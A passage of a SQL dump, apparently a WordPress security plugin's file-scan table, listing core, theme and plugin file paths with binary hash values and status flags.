Z\Z#`!�.','',0,'?'),('X�TCW_^��og��','wp-admin/includes/class-wp-debug-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�:�UJNJt���ѷ','��_�.C��=�v<^(���6�.�Dه� �','',0,'?'),('Y�\'Y12�\Z!(Lb�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/htmlmixed/htmlmixed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�P�Sd�H�e�a�','�S�b�̴��O�5��<��$��(���s�� ��','',0,'?'),('Y��:���=�Jlh%','wp-content/themes/simpleshift/inc/kirki/includes/styles/class-kirki-styles-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��R���Qb�?�iqT','��J�3l`��y���\Z��ր��\0�=$`(!���}','',0,'?'),('Y����bڧ,��J','wp-includes/Requests/Exception/HTTP/405.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8т�m!�Ҭ����','j�b�횄��^U�sv8�$b����M�3y�','',0,'?'),('Y&�6��ڳ��6����','wp-content/plugins/wp-cerber/assets/flags/mg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��;��P�IH\\�','�d|�-uc�P�����V����Oh�`��_','',0,'?'),('Y(�K���g\0��_��','wp-includes/js/dist/annotations.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%e���F�\"�8�]','�U��8�E�]�\0{\"�2��Eh��$���*�\'�H','',0,'?'),('Y,Qp�gmu#�e���~','wp-includes/widgets/class-wp-nav-menu-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8x$�9�hQ&�','n~��B�Ȳ���|�4�[�U�`\0�2�J۷�','',0,'?'),('Y/�ޑ�	���\Z���','wp-includes/js/dist/escape-html.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E����e����c�k�','8:���\Z�U$D_�t���8(f4�}%Uә�','',0,'?'),('YBc��z��^?��f�','wp-content/themes/advance/inc/kirki/assets/js/controls/multicheck.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���VJ���8�+��','EDF/8��(��5`1AĶ�&�����P0@N','',0,'?'),('YBt\n�\nc�ݟ.��vi','wp-content/plugins/wordfence/views/diagnostics/text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�R�<�)��Yf�8�','�,�Iq0\r8i;[K.�4?t�\\.ZH\Z','',0,'?'),('YN�ʜ�T�#�Z�','wp-content/themes/gambit/inc/customizer/sections/customizer-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?{&p��w��T:','V)��F�Q�4�O��m��RXglm�c����','',0,'?'),('YV�2��9}D8�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=on~Z���TOQ�Be','�<�H���\"��F�@����%���1`7<��	��}','',0,'?'),('Y_I����ʪ6�Ġ�4','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/edit/closebrackets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��x�\n3Z9Z�',')�5y�u���{=�.�qJ\\u�Z��/!I���@','',0,'?'),('Y`}#���=j�|� ��','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-fonts-google.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���	�� �-�<�c�','����\\�u*r��s�r�\n\\W>��]�cPHl','',0,'?'),('Yd�pR��?�\'n��','wp-content/themes/newsmag/inc/class-epsilon-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�,[��\r�A)�_Ǖ','}Bj��q[Mw����&|2s�`r`��Q~��','',0,'?'),('Y�La���h�(','wp-admin/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oۖ���e�y�V�Bnt','���p�S��p>�5��\r��+El�VI��5V�','',0,'?'),('Y�	?���c��<�A1�','wp-content/themes/saybusiness/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ic{3Ǩ�u��','6:��V��\'}��N��,65����#�l��','',0,'?'),('Y�,�e�A��w�`���','wp-includes/images/media/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����h�\0��ì�u','\0�Bb�3��\'��\'��)JG ��](G�9Pr2 s','',0,'?'),('Y��4\0H�hf#��M�','wp-content/themes/simpleshift/inc/kirki/assets/css/hint.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('Y�BWy	+�B�Om�z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��:��N�\'�Dx��N','�[��_|А�~E����+�~�E�(�`�_��','',0,'?'),('Y�68�H;%,�_c\n�','wp-includes/css/wp-auth-check.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j��b�u��=�`c','�\r[�B�{\'C�N5zZw� pȈ��I�K�e ��','',0,'?'),('Y�J+{�o(�A%f�e�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dܹ<9N1g�%�C���','o�c��̺m�J �\nK�\"�Fו�Kc�E��','',0,'?'),('Y�cq��Q�5�FC��l	','wp-content/themes/advance/inc/kirki/assets/js/controls/dimension.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)�d�\"�.�� 1','�;�d�A\'	A��@�f�*�P<(�Q�m��y','',0,'?'),('Y�4�akb��j���L','wp-content/themes/university-hub/inc/metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	[�۵uZ��:Q��','��<��޸<&\r��7�irڬ#�/�\\xU�̢�','',0,'?'),('YҎ��e\\��wE~Q','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/search/search.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','px\\��Q�ۿN���w','%��%�hۦ�LuYt�TS�\'[�/X�~>X�t�','',0,'?'),('Yӡ���k���̣C','wp-content/themes/authorize/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,���#M�LM�x]','�&	�UN@F+V����?j��e,�i9�\0�nis','',0,'?'),('Y����]���ŞI���','wp-includes/js/jquery/ui/effect-slide.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;I^�\Z+:C��)H[','Y��� �%��!���d!F��r`�݀��4','',0,'?'),('Yա��g�&+�ai.�','wp-content/themes/metro-magazine/inc/customizer/sanitization-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ES���hALP�x$���','�懓�ɶ�ry1��6�� �<\ZN\'�I��p�O','',0,'?'),('Y֝��U����}�r/','wp-includes/SimplePie/Cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��~ܯ{ʹ���+h�','�md�����n�nun�pU0 l��6���Zi�R','',0,'?'),('Y�d�}V<\'\n�W�7R','wp-content/themes/enigma/css/snow.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'��\raEb���','_A���%\\���+���w%�^�\0,\"��Y','',0,'?'),('Y�f�4���=!�l�`p','wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'r2U�������X','3u�2;Wm��j��ۻ����\"\0!4���h0l:','',0,'?'),('Y�UL�5J�ޔ�v[�','wp-includes/rest-api/search/class-wp-rest-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��x&����{\n�x�\\','�sޢ���zj�λ�\'Ҳ���wE�?��','',0,'?'),('Y��\"�c&�^��T','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-buttonset-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F7�<�)��IC�r</�','js/�/8�0��,��|b�@��	B\"�.�*�O�','',0,'?'),('Y��7��J�<4��h�c','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/selection/mark-selection.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�DA��Bd���}}','N�HӅ��RŸ���iVS�ә60�_?;�)�','',0,'?'),('Y�Q��ת�;/�%c��','wp-content/themes/wp-simple/inc/kirki/includes/dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0��& �u[ήЯ?�3','ǣ�����b �n/�C�X���<�lF�S�','',0,'?'),('Y����~�Q�(nI�','wp-content/themes/simpleshift/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R@]��ܶ�Q��3�7��','���.45Q|�%�\0�e�.��\"�Q�)\Z���','',0,'?'),('Y�>1�7{6\">�2f*�:','wp-content/plugins/wp-cerber/assets/flags/uy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','txd)b}PJ��kJ@�8','	�ꬬ0�b���\0J��dczE�!(C��P','',0,'?'),('Y�`�Ɍ��5Ӧ���','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/display/placeholder.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��V�/~�Z�E�\n��','�+9=���W�N���O3\r���J��9��','',0,'?'),('Z�O�\'�ʬ9�[IZh','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-sortable-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�sU�b;\Zy\rѽ>','�N,�GKA���|��*��Y$��\"\Zg^v��B�N�','',0,'?'),('Z8�%�Y�7ǸQ/','wp-content/themes/catch-flames/inc/panel/images/right-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@R.5��4,aL��','R��_L �+�F���k��R]`��5���N�','',0,'?'),('Z\"�\"��ص�����','wp-content/themes/university-hub/css/widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k>V2\0��R�^z','�V��1�̋�3����9�3S���yk`��Qd','',0,'?'),('Z�^?�*9�lGs�q','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/mbo.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˑ��%a�y/ti����','C\n��=�ZZ�D�\n[����\0��-�}w�L','',0,'?'),('Z.,�y|�S�s�C\"','wp-content/themes/exoplanet/functions/css/admin-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y]Q+�c�HF���\"','�CX���t��C_����w�\"�=8l�iE�����','',0,'?'),('Z4<n?e�����','wp-content/plugins/wordfence/lib/wfConfig.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����k�P$f��','�ڷ�s,9��a�a�8�ˬ�<�+��p�ql�','',0,'?'),('Z9���}.��J��k=�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I��\Z\n�ӣ�','i>z���R�@������k�W��6u�k�y�','',0,'?'),('Z=���tW\"�k����','wp-content/themes/gambit/inc/theme-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3����=@Q���@ ','�0غ\\��x�-�x.�\\i��Ax�`d�4','',0,'?'),('ZD�:-h�${�ma�','wp-content/plugins/wordfence/images/sort_desc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?զ�)X�?�N�','b�EԚ�B�#:�(�#�=_(�\Z���|��U�#�','',0,'?'),('ZJ�i����M��_�\\','wp-content/themes/quicksand/js/fitvids.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���!MKmEjM��','ת�p�.�GX�ҕ�ef�&uQ� ��%��i�Q','',0,'?'),('ZP�e2I�� ��[͠�','wp-content/themes/twentytwentyone/assets/sass/07-utilities/a11y.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ТWHKC�}��&�%��','��$�FT���~K�K�`��e�c=��;���;','',0,'?'),('ZX^�_prѐC�:','wp-content/themes/catch-flames/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yo�O=���u�J�\'&�b','���e!׿�p��R@����v�oA,!�;','',0,'?'),('ZY�<}���*a�F���','wp-content/plugins/wp-cerber/assets/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��:d�b���EF�R','��z��kG��� �A�Kyh��b��a��h','',0,'?'),('Z[^�&s3 �f��l','wp-content/themes/advance/inc/kirki/assets/js/reset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�D��z��ؒ^','v��aAkP��TrBC^z��(piB�i��k:�','',0,'?'),('Z^�k�\'��p�g]t','wp-content/themes/metro-magazine/inc/widgets/widget-social-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�`ZX��2�d	��','�K�K�7=u��F^�5rs���D\\��5��X','',0,'?'),('Zi�D(��g�ǣϑE','wp-content/themes/advance/inc/kirki/includes/class-kirki-scripts-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<CX-�脄�eg�h`','+��W�<J�&�Fy�MRő���e���X','',0,'?'),('Zp_Z	JI����q�m`','wp-content/plugins/wp-cerber/assets/flags/pa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�Y]�v\"���','���.oC���]1%�lЕ�Ul��\Z������#','',0,'?'),('Zx��1�2K�Z�,��','wp-includes/customize/class-wp-customize-header-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�\0W>$����l�^ҳ','Qy(u�&���v�ӳ\'-�}�hՒ��X��t�','',0,'?'),('ZҌ�[��\nv���	F','wp-includes/SimplePie/gzdecode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��rF<�\ZiǨu��','|��R\'gAE�ێ���q��q�T!��:�O0�_','',0,'?'),('Z���%B.}x�����','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/sortable.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��?7��|nq;T�','`#ó��ːŘ3f6�b��0�;����,���J','',0,'?'),('Z�ew�E��\\��\\F�+','wp-content/themes/advance/images/logosaf.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���>3�� ���',']��<����$�E.��k2�:��\r�>','',0,'?'),('Z�_\"��~�J�����','wp-includes/js/wp-custom-header.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KO��x �3��y;9�','��X$A���\r\"N��e�$ߦ��+���L(','',0,'?'),('Z�~Y/l����*�&�','wp-content/plugins/wp-cerber/assets/flags/vn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f6J%��C���v,\nc','�_���1:�L��v�Q��ܺ�.����|','',0,'?'),('Z��я�ݒ��S�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\Z^Z�HG�%�O�','�m���c�;�\ny㐲��0,�5���F|=�C','',0,'?'),('Z����� %/�Z�z9��','wp-admin/includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/a�ag�����','��	T+�ݟ���v$L�3���G��!�j��','',0,'?'),('Z�	#�˃L��ҠL{','wp-content/themes/wp-simple/inc/kirki/includes/styles/class-kirki-styles-output-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�PYu��x�u','��h��@���|�8��Z���Lni9��ʷ','',0,'?'),('Z�\0��Y���� æfg','wp-includes/js/crop/marqueeVert.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0���9��R���','K�cg$�e���2\\p�$�1z�����`CkJ�','',0,'?'),('Z�VB�2B\"D�]C�Z','wp-content/themes/university-hub/inc/customizer/option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OHD:x*��ϲ�U@��','�Zڧy����}�8��.\0�-iZ~j�o��.\\','',0,'?'),('Z�ĩ��	�q����W�','wp-content/themes/wp-simple/inc/kirki/assets/js/kirki-functions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C �H�����/gǝ�',' ��[{��;��T�f҄Ms�����j�yE<�','',0,'?'),('Z�7�Q-J�[FۇV3��','wp-content/themes/authorize/assets/stylesheets/font-awesome/scss/_stacked.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�#r&�߼��F�','%蠢u��|F�X�)|���\r�R<�O��G','',0,'?'),('Z�}��z)�_{ K�','wp-content/themes/gambit/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�1�k�f��_�','H�3�1���ap�@ʡ�P	�\0�����a�J�','',0,'?'),('Z���:�d�C�vn','wp-content/themes/brickyard/images/sidebar-ul.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R���C��x.fE?','o�?S\Z�±58����w슰ÈU�rH�q','',0,'?'),('Z�u=�7��0�','wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>�����y��','�+a�R�\"�͋kDxgd]��h���E�_#','',0,'?'),('Z�{��!Nnj\0!cH','wp-content/themes/graduate/inc/customizer/validation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>R{��v��)�','}Qh;��3�n4�*�NG�:k�O=�G���','',0,'?'),('Z�R���r(�&b��:�-','wp-includes/css/dist/format-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6���F۔�\'�V��','�h�}����]�ާ֚��$_8Znyi�E�4V����','',0,'?'),('Z��=ӧ�rc\"��y�','wp-includes/IXR/class-IXR-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��VdB+A�J?��#','��{~�(#�\Z6u����,����?�jk2��`','',0,'?'),('Z���~�i��w�<Ÿ','wp-content/themes/catch-responsive/js/jquery.cycle/jquery.cycle2.flip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������9)s��~[�','9��.W����$��ܜ���HM&�v�ֿ	','',0,'?'),('Z�q��k3 ��R��','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/radio-buttonset.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�j����ֽN@>�',' �\'9Н	�o��1Kf��y��q���n�0\\iA','',0,'?'),('[�i1�[^ʪ�8�','wp-content/themes/simpleshift/inc/kirki/assets/css/customizer.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�Z��B�%�\n��','�xr�t-��,~c�;��\n��j�\0��{j','',0,'?'),('[̉��$���\'��','wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɚ�u\\	���','c�V�����x�y(#il8L}e޷��','',0,'?'),('[�i������','wp-content/themes/Kent/content-single.php',0,'����x�x�mB�L','����x�x�mB�L','���gJk$7b�fM�Vp�>G�$�1IdIY�','',0,'?'),('[�G���e�a\'�i��','wp-includes/js/jquery/ui/datepicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4P1,ٝ�`x����','�]w\'��d�<s��6�>4Sڭ���s��/�=��','',0,'?'),('[\'L�F�d�+���k','wp-content/plugins/wp-cerber/assets/flags/li.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�f�9�%��QZ!�;','�`A��/�\\) 5/�����簤��GJ���`�','',0,'?'),('[-%#�3W���]�f�N','wp-content/themes/city-store/assets/font-awesome/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J3�$ NG�xB\0p�','.�5%�e|br�%�R�>e���t���I�k','',0,'?'),('[5���Y�Nh���K�M�','wp-includes/customize/class-wp-widget-area-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<w܌*�t���!�','44�w�Vv�Oa5G��39��I����=�5��i','',0,'?'),('[IS9Q+ũ=�ٷ�','wp-content/themes/wp-simple/assets/js/jquery.waypoints.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C����>y��Y�ǒF','r:�؝��p�q��6�\\b[\"�kV��#','',0,'?'),('[L���G�9����/Z','wp-content/themes/wp-simple/assets/js/jquery.waypoints.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ת��`:x^B\'��\Z0�','P��6&a�H[ԭa,�j�8�_��Q� [Z�','',0,'?'),('[\\��/ Z�:u9�	�>','wp-content/themes/authorize/assets/stylesheets/font-awesome/scss/_rotated-flipped.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]K�ި�(Ҫ�et��','�8�n��K١�:����Q�v�S���n','',0,'?'),('[d6F\"\r�Ȁ�J��\r��','wp-content/themes/gambit/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xaͷ����I','�_o�����M\"��yi�����tU�@�','',0,'?'),('[fz�+P,�B�����','wp-content/themes/brickyard/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�	c$pv=h�\'�rN','춊�nd0��::C����#\r-�Ѐzc����','',0,'?'),('[o�\Zs�W�`a���','wp-content/themes/hemingway/content-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�Gc�K胍 p���','<����#������!ֿ�\'��bs�\n��','',0,'?'),('[w�[ᄅ�\r	|2I�)','wp-content/plugins/wp-cerber/assets/flags/hu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C��.F��L\nc��Q','�g.XaMw�Ma-#lW���=���h��1�U�h','',0,'?'),('[�8}��\n��\rWԪ','wp-content/themes/skt-pathway/images/bull_right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̑ZZ7�&�}6SjU&','�3[@t6�ꊔ8@&���\Z���9v��/�mVW�','',0,'?'),('[��\\�`\n��X��i׌','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/markdown/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&g?���0W��K�','ߖ�h��Ç\Z[ه����9=0�$�Q���','',0,'?'),('[�H�9�Suo���c%','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-color-alpha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�FbE�O�R(V�k��Q','RPB�6W\Z\n���t�\"l�1��]�L�\ZZ9i�o','',0,'?'),('[��#ܧ\Z>]��<�','wp-admin/css/colors/ectoplasm/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1/�?n�.�EL�-��','t$�yC�\0.J���.�O��}��\"g�=�','',0,'?'),('[�>�x�;�wn/t�H','wp-includes/js/wp-emoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+g�D>�w�f�م*�D','M�aF��$�*�M��_�����n8���v�u�','',0,'?'),('[��$c�qr��9h���','wp-content/plugins/wordfence/js/jquery.qrcode.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('[���1�YAdk�,','wp-includes/SimplePie/Sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�l����fp��x��','���O\nQp���5�A�~������j��xt�','',0,'?'),('[����&��P!ǀ�','wp-content/themes/exoplanet/images/exoplanet-light-squares.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/Y�-B_�hǸq','�\Z���U5�������h�����@�\n��g�)','',0,'?'),('[�y�?؟��W���v','wp-content/themes/metro-magazine/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u?���֬�1l�j','���i���6I�y)�j�rL��$���y��\nI','',0,'?'),('[�����~�*��p.R','wp-content/themes/metro-magazine/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߅���4)�VN��4b�','ԭ�[���|+��F�=���Ʊ����JS��E�','',0,'?'),('[�Y��44�Or��l0�','wp-includes/Requests/Exception/HTTP/414.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]U�@���)��#h','��H������i���c�!��I).eh������','',0,'?'),('[�E�&�?~v��k�?','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/search/matchesonscrollbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���:�4��p���a','�L�p��+]+�9��	�d���g|���f���','',0,'?'),('[�d��0��� �G','wp-content/themes/Endolf/FT/options/banners.php',0,'_�}ӆ`��\\�K	','_�}ӆ`��\\�K	','�ʺ\r[E�J����CE].Ț\r�{�J=8\"�hL�','',0,'?'),('[�[��H\0>�2�o','wp-content/themes/graphene/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"=ؘ�˪�s�*d�I','T!���+Y��SHwkkw��\0�ko�[�#���','',0,'?'),('[��0>z�Q�A^)#��)','wp-content/themes/skt-pathway/images/transparent_black.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OL��+���]��ur','�^F�օV��^B�tf`Y)��/XAH���ʹs���','',0,'?'),('[�U�$�&g|�t=Σ�G','wp-content/themes/advance/inc/widgets/advance_serviceblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��)�r��Դ\'','f��3�%H4��7N:�Z�8�<!�٘ɝ������','',0,'?'),('[ꠏ�|K�o�یb7�','wp-admin/user/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xCS6�LC�2!�u�','�`K����y2M��plξ\"a\0אּ�t�ޡD','',0,'?'),('[�L	����3�_K�3�','wp-content/themes/monograph/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lTY�n��4�fs8�','a��B�(�q�O��Ig�X�\n�G\r�-���VS�','',0,'?'),('[��>=%h���*��R�!','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/icecoder.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gو�>\0z����6','�T\ZX��:�†��s�D�\0\'ɝv�J���\nQN','',0,'?'),('\\�%�?�>����e8','wp-includes/class-wp-block-pattern-categories-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��i���詿/�!','��(Y�E�U��<d�y���K	2�bsy�Z�L�','',0,'?'),('\\(�]�����s�Z','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� -���%	dmo�´T','�*��ܖ���,m%����i�[�\"��Ý�C�!','',0,'?'),('\\��\n����j�.��','wp-content/themes/hitmag/inc/kirki/assets/scss/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����0�w���\'1j�','�Ȝ�7�Kc`�ɧ�k�����F9�L���','',0,'?'),('\\�9�C��t��N��\'','wp-content/themes/graduate/inc/customizer/sections/top-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>.�aӇ賄�<K��','�\"� �y\n+��;F\\�N�V���vF<��k','',0,'?'),('\\�����9�����','wp-admin/ms-upgrade-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qc��8���E�%��!','	�H�_c��Q�X��̤�ՏLs�ڭ�','',0,'?'),('\\\Z3dh�EA��뫽�','wp-content/themes/newsmag/assets/sass/site/secondary/_widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�P��P��1��#���','�#̣s��\r����4F�[d��,?l�3','',0,'?'),('\\�2KϨގ؞H��','wp-content/themes/brickyard/template-without-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����RI^�Lo��','R��̘:�p.5��+�MH�^Z~\n��','',0,'?'),('\\/ө��J|ǵKb�P','wp-content/themes/auberge/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����GE�y[Zb�','��#\Z|bghnėts�R\":�WkVۇ�}e�ܧKA','',0,'?'),('\\59\r�sSy9m�